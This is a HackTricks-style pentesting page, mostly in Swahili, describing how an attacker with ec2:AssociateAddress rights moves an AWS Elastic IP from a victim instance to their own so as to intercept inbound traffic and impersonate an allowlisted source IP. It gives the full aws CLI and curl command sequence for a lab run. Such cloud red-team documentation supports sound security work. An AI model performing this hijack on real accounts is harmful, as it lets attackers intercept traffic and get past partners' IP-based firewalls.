AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

Muhtasari

Tumia vibaya ec2:AssociateAddress (na hiari ec2:DisassociateAddress) ili kuunganisha tena Elastic IP (EIP) kutoka kwa victim instance/ENI hadi attacker instance/ENI. Hii inaelekeza trafiki ya kuingia iliyokuwa ikielekezwa kwa EIP kwenda kwa attacker na pia inamruhusu attacker kuanzisha trafiki ya kutoka kwa nje ikitumia public IP iliyoorodheshwa (allowlisted) ili kupita firewalls za washirika wa nje.

Mahitaji

• Target EIP allocation ID ndani ya account/VPC ileile.
• Attacker instance/ENI unayodhibiti.
• Ruhusa:
• ec2:DescribeAddresses
• ec2:AssociateAddress on the EIP allocation-id and on the attacker instance/ENI
• ec2:DisassociateAddress (hiari). Kumbuka: --allow-reassociation itafanya auto-disassociate kutoka kwa attachment ya awali.

Shambulio

Vigezo

REGION=us-east-1
ATTACKER_INSTANCE=<i-attacker>
VICTIM_INSTANCE=<i-victim>

1. Tenga au tambua EIP ya mhusika (maabara inatenga mpya na kuiambatisha kwa mhusika)

ALLOC_ID=$(aws ec2 allocate-address --domain vpc --region $REGION --query AllocationId --output text)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $VICTIM_INSTANCE --region $REGION
EIP=$(aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION --query Addresses[0].PublicIp --output text)

2. Thibitisha kuwa EIP kwa sasa inaelekezwa kwa huduma ya mwanaathirika (mfano: angalia banner)

curl -sS http://$EIP | grep -i victim

3. Tambatanisha tena EIP kwa mshambulizi (inaondoa uhusiano na mwathiriwa moja kwa moja)

aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $ATTACKER_INSTANCE --allow-reassociation --region $REGION

4. Thibitisha kuwa EIP sasa inaelekeza kwa huduma ya mshambuliaji

sleep 5; curl -sS http://$EIP | grep -i attacker

Ushahidi (uhusiano ulihamishwa):

aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION \
--query Addresses[0].AssociationId --output text

Athari

• Inbound impersonation: Trafiki yote kwenda EIP iliyotekwa inapelekwa kwenye instance/ENI ya mshambuliaji.
• Outbound impersonation: Mshambuliaji anaweza kuanzisha trafiki inayoonekana kutokea kutoka kwa allowlisted public IP (inayofaa kuvuka vichujio vya IP vya washirika/vyanzo vya nje).

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.